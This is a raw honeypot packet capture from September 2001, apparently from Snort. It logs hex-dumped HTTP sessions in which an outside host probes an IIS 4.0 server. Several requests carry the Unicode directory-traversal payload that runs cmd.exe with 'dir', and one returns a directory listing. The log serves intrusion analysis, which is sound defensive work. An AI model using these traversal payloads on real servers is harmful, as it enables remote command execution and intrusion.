hlen=5 TOS=0 dlen=44 ID=26801 flags=0 offset=0 TTL=118 chksum=60133
TCP: port=2621 -> dport: 80 flags=******S* seq=488451082
ack=0 off=6 res=0 win=8192 urp=0 chksum=29501
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25777) [2001-09-18 10:22:52] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=30730 flags=0 offset=0 TTL=128 chksum=53644
TCP: port=80 -> dport: 2621 flags=***A**S* seq=625399
ack=488451083 off=6 res=0 win=8760 urp=0 chksum=58867
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25789) [2001-09-18 10:22:53] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=51889 flags=0 offset=0 TTL=119 chksum=34793
TCP: port=2621 -> dport: 80 flags=***A**** seq=488451083
ack=625400 off=5 res=0 win=8760 urp=0 chksum=64944
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25790) [2001-09-18 10:22:53] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=117 ID=52145 flags=0 offset=0 TTL=119 chksum=34460
TCP: port=2621 -> dport: 80 flags=***AP*** seq=488451083
ack=625400 off=5 res=0 win=8760 urp=0 chksum=59769
Payload: length = 71
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 64 6C 6C 20 ./Admin.dll dll
020 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 HTTP/1.0..Host:
030 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E www..Connnection
040 : 3A 20 63 6C 6F 73 65 : close
----------------------------------------------------------------------------
--
#(2 - 25792) [2001-09-18 10:22:53] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=318 ID=33290 flags=0 offset=0 TTL=128 chksum=50810
TCP: port=80 -> dport: 2621 flags=***AP*** seq=625400
ack=488451160 off=5 res=0 win=8683 urp=0 chksum=60274
Payload: length = 278
000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16:
050 : 30 36 3A 33 34 20 47 4D 54 0D 0A 43 6F 6E 74 65 06:34 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng
080 : 74 68 3A 20 31 33 39 0D 0A 0D 0A 3C 68 74 6D 6C th: 139....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 70 72 6F 63 d><body>The
proc
0c0 : 65 73 73 20 63 61 6E 6E 6F 74 20 61 63 63 65 73 ess cannot acces
0d0 : 73 20 74 68 65 20 66 69 6C 65 20 62 65 63 61 75 s the file becau
0e0 : 73 65 20 69 74 20 69 73 20 62 65 69 6E 67 20 75 se it is being u
0f0 : 73 65 64 20 62 79 20 61 6E 6F 74 68 65 72 20 70 sed by another p
100 : 72 6F 63 65 73 73 2E 20 3C 2F 62 6F 64 79 3E 3C rocess.
</body><
110 : 2F 68 74 6D 6C 3E /html>
----------------------------------------------------------------------------
--
#(2 - 25793) [2001-09-18 10:22:53] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=33546 flags=0 offset=0 TTL=128 chksum=50832
TCP: port=80 -> dport: 2621 flags=***A***F seq=625678
ack=488451160 off=5 res=0 win=8683 urp=0 chksum=64665
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25800) [2001-09-18 10:22:53] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=36786 flags=0 offset=0 TTL=118 chksum=50152
TCP: port=2621 -> dport: 80 flags=*****R** seq=488451160
ack=0 off=5 res=0 win=0 urp=0 chksum=43689
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25801) [2001-09-18 10:22:53] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=44 ID=37042 flags=0 offset=0 TTL=118 chksum=49892
TCP: port=2999 -> dport: 80 flags=******S* seq=490886960
ack=0 off=6 res=0 win=8192 urp=0 chksum=18040
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25802) [2001-09-18 10:22:53] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=36362 flags=0 offset=0 TTL=128 chksum=48012
TCP: port=80 -> dport: 2999 flags=***A**S* seq=626480
ack=490886961 off=6 res=0 win=8760 urp=0 chksum=46325
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25803) [2001-09-18 10:22:53] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=37298 flags=0 offset=0 TTL=118 chksum=489
TCP: port=2621 -> dport: 80 flags=*****R** seq=488451160
ack=488451160 off=5 res=0 win=0 urp=0 chksum=24884
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25808) [2001-09-18 10:22:54] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=47026 flags=0 offset=0 TTL=119 chksum=39656
TCP: port=2999 -> dport: 80 flags=***A**** seq=490886961
ack=626481 off=5 res=0 win=8760 urp=0 chksum=52402
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25809) [2001-09-18 10:22:54] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=138 ID=47282 flags=0 offset=0 TTL=119 chksum=39302
TCP: port=2999 -> dport: 80 flags=***AP*** seq=490886961
ack=626481 off=5 res=0 win=8760 urp=0 chksum=23251
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D ir dir HTTP/1.0.
040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host: www..Conn
050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nection: close
----------------------------------------------------------------------------
--
#(2 - 25810) [2001-09-18 10:22:54] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=644 ID=38154 flags=0 offset=0 TTL=128 chksum=45620
TCP: port=80 -> dport: 2999 flags=***AP*** seq=626481
ack=490887059 off=5 res=0 win=8662 urp=0 chksum=33774
Payload: length = 604
000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date:
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001
050 : 20 31 36 3A 30 36 3A 33 34 20 47 4D 54 0D 0A 43 16:06:34 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for.
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25811) [2001-09-18 10:22:54] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=38410 flags=0 offset=0 TTL=128 chksum=45968
TCP: port=80 -> dport: 2999 flags=***A***F seq=627085
ack=490887059 off=5 res=0 win=8662 urp=0 chksum=51797
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25820) [2001-09-18 10:22:54] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=60850 flags=0 offset=0 TTL=118 chksum=26088
TCP: port=2999 -> dport: 80 flags=*****R** seq=490887059
ack=0 off=5 res=0 win=0 urp=0 chksum=32207
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25821) [2001-09-18 10:22:54] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=44 ID=61106 flags=0 offset=0 TTL=118 chksum=25828
TCP: port=3040 -> dport: 80 flags=******S* seq=490887428
ack=0 off=6 res=0 win=8192 urp=0 chksum=17531
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25822) [2001-09-18 10:22:54] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=41482 flags=0 offset=0 TTL=128 chksum=42892
TCP: port=80 -> dport: 3040 flags=***A**S* seq=627281
ack=490887429 off=6 res=0 win=8760 urp=0 chksum=45015
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25823) [2001-09-18 10:22:54] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=61362 flags=0 offset=0 TTL=118 chksum=41960
TCP: port=2999 -> dport: 80 flags=*****R** seq=490887059
ack=490887059 off=5 res=0 win=0 urp=0 chksum=2298
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25860) [2001-09-18 10:22:57] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=51978 flags=0 offset=0 TTL=128 chksum=32396
TCP: port=80 -> dport: 3040 flags=***A**S* seq=627281
ack=490887429 off=6 res=0 win=8760 urp=0 chksum=45015
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25861) [2001-09-18 10:22:58] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=34741 flags=0 offset=0 TTL=119 chksum=51941
TCP: port=3040 -> dport: 80 flags=***A**** seq=490887525
ack=627282 off=5 res=0 win=8760 urp=0 chksum=50996
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25864) [2001-09-18 10:23:03] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=136 ID=27322 flags=0 offset=0 TTL=119 chksum=59264
TCP: port=3040 -> dport: 80 flags=***AP*** seq=490887429
ack=627282 off=5 res=0 win=8760 urp=0 chksum=35756
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
----------------------------------------------------------------------------
--
#(2 - 25865) [2001-09-18 10:23:03] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=644 ID=60938 flags=0 offset=0 TTL=128 chksum=22836
TCP: port=80 -> dport: 3040 flags=***AP*** seq=627282
ack=490887525 off=5 res=0 win=8664 urp=0 chksum=32463
Payload: length = 604
000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date:
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001
050 : 20 31 36 3A 30 36 3A 34 34 20 47 4D 54 0D 0A 43 16:06:44 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for.
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25866) [2001-09-18 10:23:03] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=61194 flags=0 offset=0 TTL=128 chksum=23184
TCP: port=80 -> dport: 3040 flags=***A***F seq=627886
ack=490887525 off=5 res=0 win=8664 urp=0 chksum=50487
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25867) [2001-09-18 10:23:04] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=37306 flags=0 offset=0 TTL=118 chksum=49632
TCP: port=3040 -> dport: 80 flags=*****R** seq=490887525
ack=0 off=5 res=0 win=0 urp=0 chksum=31700
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25868) [2001-09-18 10:23:04] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=44 ID=37562 flags=0 offset=0 TTL=118 chksum=49372
TCP: port=3922 -> dport: 80 flags=******S* seq=491792565
ack=0 off=6 res=0 win=8192 urp=0 chksum=29002
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25869) [2001-09-18 10:23:04] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=62218 flags=0 offset=0 TTL=128 chksum=22156
TCP: port=80 -> dport: 3922 flags=***A**S* seq=636895
ack=491792566 off=6 res=0 win=8760 urp=0 chksum=46872
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25870) [2001-09-18 10:23:04] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=37818 flags=0 offset=0 TTL=118 chksum=65504
TCP: port=3040 -> dport: 80 flags=*****R** seq=490887525
ack=490887525 off=5 res=0 win=0 urp=0 chksum=1325
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25871) [2001-09-18 10:23:04] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=51386 flags=0 offset=0 TTL=119 chksum=35296
TCP: port=3922 -> dport: 80 flags=***A**** seq=491792566
ack=636896 off=5 res=0 win=8760 urp=0 chksum=52949
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25872) [2001-09-18 10:23:04] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=140 ID=51642 flags=0 offset=0 TTL=119 chksum=34940
TCP: port=3922 -> dport: 80 flags=***AP*** seq=491792566
ack=636896 off=5 res=0 win=8760 urp=0 chksum=10943
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E ir c+dir HTTP/1.
040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host: www..Co
050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F nnnection: clo
----------------------------------------------------------------------------
--
#(2 - 25873) [2001-09-18 10:23:04] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=231 ID=63242 flags=0 offset=0 TTL=128 chksum=20945
TCP: port=80 -> dport: 3922 flags=***AP*** seq=636896
ack=491792666 off=5 res=0 win=8660 urp=0 chksum=31770
Payload: length = 191
000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso
020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date
030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 : Tue, 18 Sep 20
040 : 30 31 20 31 36 3A 30 36 3A 34 35 20 47 4D 54 0D 01 16:06:45 GMT.
050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a
060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet
070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20 -stream..Volume
080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E in drive C has n
090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65 o label...Volume
0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69 Serial Number i
0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A s 80B4-89CA....
----------------------------------------------------------------------------
--
#(2 - 25874) [2001-09-18 10:23:04] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=451 ID=63498 flags=0 offset=0 TTL=128 chksum=20469
TCP: port=80 -> dport: 3922 flags=***AP**F seq=637087
ack=491792666 off=5 res=0 win=8660 urp=0 chksum=27215
Payload: length = 411
000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A Directory of C:
010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \Inetpub\scripts
020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 31 ....09/18/01 11
030 : 3A 30 35 61 20 20 20 20 20 20 20 20 3C 44 49 52 :05a <DIR
040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39 > ...09
050 : 2F 31 38 2F 30 31 20 20 31 31 3A 30 35 61 20 20 /18/01 11:05a
060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 <DIR>
070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30 ....09/18/0
080 : 31 20 20 31 31 3A 30 36 61 20 20 20 20 20 20 20 1 11:06a
090 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344
0a0 : 54 46 54 50 32 30 31 0D 0A 30 39 2F 31 38 2F 30 TFTP201..09/18/0
0b0 : 31 20 20 31 31 3A 30 34 61 20 20 20 20 20 20 20 1 11:04a
0c0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344
0d0 : 54 46 54 50 32 30 36 0D 0A 30 39 2F 31 38 2F 30 TFTP206..09/18/0
0e0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a
0f0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344
100 : 54 46 54 50 32 32 32 0D 0A 30 39 2F 31 38 2F 30 TFTP222..09/18/0
110 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a
120 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344
130 : 54 46 54 50 38 34 0D 0A 20 20 20 20 20 20 20 20 TFTP84..
140 : 20 20 20 20 20 20 20 36 20 46 69 6C 65 28 73 29 6 File(s)
150 : 20 20 20 20 20 20 20 20 32 32 39 2C 33 37 36 20 229,376
160 : 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 20 bytes..
170 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
180 : 20 32 2C 31 30 30 2C 31 36 39 2C 32 31 36 20 62 2,100,169,216 b
190 : 79 74 65 73 20 66 72 65 65 0D 0A ytes free..
----------------------------------------------------------------------------
--
#(2 - 25875) [2001-09-18 10:23:05] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=5563 flags=0 offset=0 TTL=118 chksum=15840
TCP: port=3922 -> dport: 80 flags=*****R** seq=491792666
ack=0 off=5 res=0 win=0 urp=0 chksum=43167
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25876) [2001-09-18 10:23:05] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=44 ID=5819 flags=0 offset=0 TTL=118 chksum=15580
TCP: port=3995 -> dport: 80 flags=******S* seq=491921308
ack=0 off=6 res=0 win=8192 urp=0 chksum=31256
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25877) [2001-09-18 10:23:05] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=65034 flags=0 offset=0 TTL=128 chksum=19340
TCP: port=80 -> dport: 3995 flags=***A**S* seq=637867
ack=491921309 off=6 res=0 win=8760 urp=0 chksum=48154
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25878) [2001-09-18 10:23:05] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=6331 flags=0 offset=0 TTL=118 chksum=31456
TCP: port=3922 -> dport: 80 flags=*****R** seq=491792666
ack=491792666 off=5 res=0 win=0 urp=0 chksum=25141
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25883) [2001-09-18 10:23:05] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=10684 flags=0 offset=0 TTL=119 chksum=10463
TCP: port=3995 -> dport: 80 flags=***A**** seq=491921309
ack=637868 off=5 res=0 win=8760 urp=0 chksum=54231
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25884) [2001-09-18 10:23:05] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=195 ID=10940 flags=0 offset=0 TTL=119 chksum=10052
TCP: port=3995 -> dport: 80 flags=***AP*** seq=491921309
ack=637868 off=5 res=0 win=8760 urp=0 chksum=37455
Payload: length = 139
